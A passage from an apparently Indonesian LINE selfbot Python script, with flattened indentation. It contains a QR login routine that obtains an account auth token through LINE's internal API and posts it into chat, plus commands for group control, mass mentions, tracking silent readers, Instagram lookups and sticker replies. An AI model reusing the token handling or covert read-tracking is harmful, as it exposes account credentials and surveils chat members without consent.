"text": "sᴇɢᴇʀᴀ ᴋʟɪᴋ ʟᴏɢɪɴ ᴜɴᴛᴜᴋ ʟᴏɢɪɴ,\nᴅᴀɴ ᴋʟɪᴋ ʟɪɴᴋ ᴜɴᴛᴜᴋ ᴍᴇɴᴀᴍᴘɪʟᴋᴀɴ ʟɪɴᴋ.",
"size": "md",
"weight": "bold",
"wrap": True,
"color": "#40E0D0",
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00008B"
},
"header": {
"backgroundColor": "#00008B"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_oc=AQmPqDNEtZ1BaAsV88hv6Omtb4iAYtqLIB5eZ246K8p9zIaCWAh_LZUH4IJCIf6Izco&_nc_ht=scontent.fcgk8-1.fna&oh=1b6bbfe37e1ee80e79e251928d173319&oe=5D78D8F5",
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "LOGIN",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#7CFC00",
"action": {
"type": "uri",
"uri": str(link)
},
"align": "center"
},
{
"type": "separator",
"color": "#E5E4E2"
},
{
"type": "text",
"text": "LINK",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#FFD700",
"action": {
"type": "uri",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text="+str(link)
},
"align": "center"
}
]
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "CHROMEOS",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#000000",
"align": "center"
}
]
}
}
}
cl.sendFlex(to, data)
Headers3.update({"x-lpqs" : '/api/v4/TalkService.do', 'X-Line-Access': qr.verifier})
json.loads(requests.session().get('https://gd2.line.naver.jp/Q', headers=Headers3).text)
Headers3.update({'x-lpqs' : '/api/v4p/rs'})
transport = THttpClient.THttpClient('https://gd2.line.naver.jp/api/v4p/rs')
transport.setCustomHeaders(Headers3)
protocol = TCompactProtocol.TCompactProtocol(transport)
client = LineService.Client(protocol)
req = LoginRequest()
req.type = 1
req.verifier = qr.verifier
req.e2eeVersion = 1
res = client.loginZ(req)
print('\n')
print(res.authToken)
else:
cl.sendMessage(msg.to,str(res.authToken))
cl.sendMessage(msg.to, "Jika ini bukan Anda, silakan ketuk tautan di bawah ini \n\nline://nv/connectedDevices/")
elif text.lower() == 'tokenlist':
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "Tokenlist",
"template": {
"type": "carousel",
"actions": [],
"columns": [
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_oc=AQmPqDNEtZ1BaAsV88hv6Omtb4iAYtqLIB5eZ246K8p9zIaCWAh_LZUH4IJCIf6Izco&_nc_ht=scontent.fcgk8-1.fna&oh=1b6bbfe37e1ee80e79e251928d173319&oe=5D78D8F5",
"title": "CHROMEOS",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ CHROME 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=ChromeSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-2.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/52427967_2326064874084289_579878214831177728_o.jpg?_nc_cat=107&efg=eyJpIjoiYiJ9&_nc_eui2=AeHb8CgrGa9k6YnEI4S68ZQqC_ofKGrLNvSnsbK6vezlyCteVLjGJZYC9Gwoh3fTmSPhRQs-xosP2j1ETI4AHqVhfgT-G_SK8iIfg1i_tCVZwQ&_nc_ht=scontent.fcgk8-2.fna&oh=3e47f989cae4e4f99830f7b88b609f6c&oe=5D64AB31",
"title": "IOSIPAD",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ IOS 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=IosSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-2.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51739687_2326067977417312_5830327879942012928_n.jpg?_nc_cat=109&efg=eyJpIjoiYiJ9&_nc_eui2=AeELQzPVVYeHGkeaNu6tEg6GIqkb-hDBp8pMBsjM4_rXbuJYVVEcb77aNnsGPeT-5hjb2XqL-XnHtJZVnvijNeEDIIgYJoyoyquG9aOj2-BBhg&_nc_ht=scontent.fcgk8-2.fna&oh=4f2d6231f4b094ac6df246b28023212a&oe=5D31A0B0",
"title": "DESKTOPWIN",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ DESKTOPWIN 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=DesktopwinSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-2.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/52427967_2326064874084289_579878214831177728_o.jpg?_nc_cat=107&efg=eyJpIjoiYiJ9&_nc_eui2=AeHb8CgrGa9k6YnEI4S68ZQqC_ofKGrLNvSnsbK6vezlyCteVLjGJZYC9Gwoh3fTmSPhRQs-xosP2j1ETI4AHqVhfgT-G_SK8iIfg1i_tCVZwQ&_nc_ht=scontent.fcgk8-2.fna&oh=3e47f989cae4e4f99830f7b88b609f6c&oe=5D64AB31",
"title": "DESKTOPMAC",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ MAC 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=MacSpaces1"
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_oc=AQmPqDNEtZ1BaAsV88hv6Omtb4iAYtqLIB5eZ246K8p9zIaCWAh_LZUH4IJCIf6Izco&_nc_ht=scontent.fcgk8-1.fna&oh=1b6bbfe37e1ee80e79e251928d173319&oe=5D78D8F5",
"title": "WIN10",
"text": "ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nKETIK [ WIN10 1 ]",
"actions": [
{
"type": "uri",
"label": "CLICK",
"uri": "line://app/1623679774-k9nBDB6b?type=text&text=win10spaces1"
}
]
}
]
}
}
cl.sendFlex(to, data)
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "☠•➤"+ str(no) + ". " + mem.displayName
sendTextTemplate(to,"☠•➤Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
                ginfo = cl.getGroup(group)
                cl.leaveGroup(group)
                sendTextTemplate(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "friendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "╠☠•➤" + str(a) + ". " +G.displayName+ "\n"
sendTextTemplate(msg.to,"╔═☠•➤[ FRIEND LIST ]\n║\n"+ma+"║\n╚═☠•➤[ Total「"+str(len(gid))+"」Friends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠☠•➤" + str(a) + ". " +G.name+ "\n"
sendTextTemplate1(msg.to,"╔═☠•➤[ GROUP LIST ]\n║\n"+ma+"║\n╚═☠•➤[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
sendTextTemplate(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
sendTextTemplate(msg.to, "Url Closed")
elif cmd == "gurl":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
sendTextTemplate(msg.to,"Kirim fotonya.....")
elif cmd == "myup":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ARfoto"][mid] = True
sendTextTemplate(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
sendTextTemplate(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
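            # Mention-all: members are mentioned in chunks of 20 per message,
            # presumably to stay under the per-message mention limit.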
elif cmd == "inex" or text.lower() == "tag":
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+1):
txt = u''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append(i.mid)
mentionMembers(msg.to, b)
elif cmd.startswith("tag room: "):
if wait["selfbot"] == True:
if msg._from in admin:
separate = msg.text.split(":")
number = msg.text.replace(separate[0] + ":"," ")
groups = cl.getGroupIdsJoined()
gid = groups[int(number)-1]
group = cl.getGroup(gid)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+1):
txt = u''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append(i.mid)
mentionMembers(gid, b)
cl.sendMessage(msg.to, "Berhasil Mention Member di Group: \n " + str(group.name))
elif cmd == "adminlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
sendTextTemplate(msg.to,"☠•➤admin\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」 Rkf" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "prolist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
                    md = ""
                    me = ""
a = 0
b = 0
c = 0
                    d = 0
                    e = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +cl.getGroup(group).name + "\n"
                    gid = protectinvite
                    for group in gid:
                        e = e + 1
                        end = '\n'
                        me += str(e) + ". " +cl.getGroup(group).name + "\n"
                    gid = protectcancel
                    for group in gid:
                        c = c + 1
                        end = '\n'
                        mc += str(c) + ". " +cl.getGroup(group).name + "\n"
                    sendTextTemplate3(msg.to,"☠•➤Protection\n\n☠•➤PROTECT URL :\n"+ma+"\n☠•➤PROTECT KICK :\n"+mb+"\n☠•➤PROTECT INVITE :\n"+me+"\n☠•➤PROTECT JOIN :\n"+md+"\n☠•➤PROTECT CANCEL:\n"+mc+"\nTotal「%s」Grup yg dijaga" %(str(len(protectqr)+len(protectkick)+len(protectinvite)+len(protectjoin)+len(protectantijs)+len(ghost)+len(protectcancel))))
elif cmd == "pamit" or cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
sendTextTemplate(msg.to, "Mohon maaf bila da salah baik lisan maupun tulisan\nBye my fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
sendTextTemplate(msg.to, "☠•➤Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
sendTextTemplate(msg.to, "Speed Ngaciiirrr...")
elapsed_time = time.time() - start
sendTextTemplate(msg.to, "{} detik".format(str(elapsed_time)))
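        # "lurking on" stores the current message id in Setmain['ARreadPoint'] as a
        # read checkpoint; members who read past it are assumed to be collected into
        # Setmain['ARreadMember'] by the read-receipt handler elsewhere in the script,
        # and "lurkers" later mentions everyone in that dict.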
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ARreadPoint'][msg.to] = msg_id
Setmain['ARreadMember'][msg.to] = {}
sendTextTemplate(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
                    sendTextTemplate(msg.to, "Lurking berhasil dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ARreadPoint']:
if Setmain['ARreadMember'][msg.to] != {}:
aa = []
for x in Setmain['ARreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage(msg)
except:
pass
try:
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
except:
pass
Setmain['ARreadPoint'][msg.to] = msg.id
Setmain['ARreadMember'][msg.to] = {}
else:
sendTextTemplate(msg.to, "User kosong...")
else:
sendTextTemplate(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on" or cmd == "x on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
sendTextTemplate(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
cl.sendMessage(msg.to, "Inex")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off" or cmd == "x off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
sendTextTemplate(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]\n"+cctv['sidermem'][msg.to])
else:
                        sendTextTemplate(msg.to, "Sudah tidak aktif")
#===========Hiburan============#
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "☠•➤Link : " + "https://www.instagram.com/" + instagram
text = "☠•➤Name : "+namaIG+"\n☠•➤Username : "+usernameIG+"\n☠•➤Biography : "+bioIG+"\n☠•➤Follower : "+followerIG+"\n☠•➤Following : "+followIG+"\n☠•➤Post : "+mediaIG+"\n☠•➤Verified : "+verifIG+"\n☠•➤Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
sendTextTemplate(msg.to,"☠•➤I N F O R M A S I •☠ \n\n"+"☠•➤Date Of Birth : "+lahir+"\n☠•➤Age : "+usia+"\n☠•➤Ultah : "+ultah+"\n☠•➤Zodiak : "+zodiak)
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
                    if conn is not None:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
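        # The keyword handlers below reply with a LINE flex "image_carousel" template
        # embedding an animated GIF that links to a sticker page or profile.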
elif "mudik" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://4.bp.blogspot.com/-g9bAUWEmJVo/Wx8oA__cmPI/AAAAAAALbhg/eDKroutr6QIgDBB2wpPL2e7nLnjIEVOxQCLcBGAs/s1600/AS0004076_03.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "lebaran" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://1.bp.blogspot.com/-ru5h6ZY1uR0/WSrEX_FADtI/AAAAAAAIGyA/MMCCNrPHXWsiv2qYMxeMekA2uYRQM081QCLcB/s1600/AW434676_01.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "thr" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://3.bp.blogspot.com/-gCrm8mfdw1A/Wx8oCN7i2VI/AAAAAAALbhs/s15NruyynGMGNLidxBFSdsW8KwzoZNuYgCLcBGAs/s1600/AS0004076_06.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "mohon maaf" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://1.bp.blogspot.com/-w6uzVV3N2D0/Wx8oBbIK_rI/AAAAAAALbhk/P56hLDKJKHU9udV6T3O_E89X3QlSmC6FACLcBGAs/s1600/AS0004076_04.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "gak puasa" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://media.tenor.com/images/13253695f2b4e34f7514848d0d118180/tenor.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "bentar lagi" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://1.bp.blogspot.com/-4iM3cPRrNXY/WSrEX0LirGI/AAAAAAAIGyE/Y4bxdP2GFwIbVyZYhY8UMfNQAyv0mCexACLcB/s1600/AW434676_00.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif "takbiran" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://3.bp.blogspot.com/-a4GQlMKGzjc/Wx8n_4IRObI/AAAAAAALbhU/9BRM5S93t7kTXl0fou0XsY4jxlCcb3d2wCLcBGAs/s1600/AS0004076_00.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
elif text.lower() == 'hahahaha':
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://4.bp.blogspot.com/-W_bn2qqdYXE/Wyhbjj2wqKI/AAAAAAANIz4/KQVsbq-aXm0kZNfFOS5SN8fqCvQ18xnUACLcBGAs/s1600/AW1238502_03.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
elif text.lower() == 'apass':
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://c-sf.smule.com/sf/s92/arr/96/be/8cf86704-a6c2-4e0c-b3c6-faaeae27ec87.jpg",
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
elif "pas band" in msg.text.lower():
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSpSWAXZ0y0WKUwH_4QwoUQ8BEev3ZHxnI5jKl5pnwTTLSo_EIo",
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
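        # "youtube <query>": scrapes the YouTube search results page with
        # BeautifulSoup, takes the second result link, then uses pafy for metadata and
        # the best stream URL before sending a flex card and the video itself.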
elif "youtube" in msg.text.lower():
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
data = {
"type": "flex",
"altText": "YOUTUBE",
"contents": {
"styles": {
"body": {
"backgroundColor": "#FFFFFF"
},
"footer": {
"backgroundColor": "#FF0000"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"url": "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSgekIeIdfny8Bgr-WBIhhZgecUBZKyE89-u_SdB6Z2P-XNPdaVXhrSL1o",
"type": "image"
},
{
"type": "separator",
"color": "#C0C0C0"
},
{
"text": "YOUTUBE\nVIDEOS\nLOADING.\nPLAY",
"size": "sm",
"color": "#000000",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"type": "separator",
"color": "#C0C0C0"
},
{
"contents": [
{
"text": "JUDUL\n " + vid.title + " ?",
"size": "xs",
"align": "center",
"color": "#000000",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
{
"type": "separator",
"color": "#C0C0C0"
},
{
"contents": [
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Author : " + str(vid.author),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
},
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Duration : " + str(vid.duration),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
},
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Likes : " + str(vid.likes),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
},
{
"contents": [
{
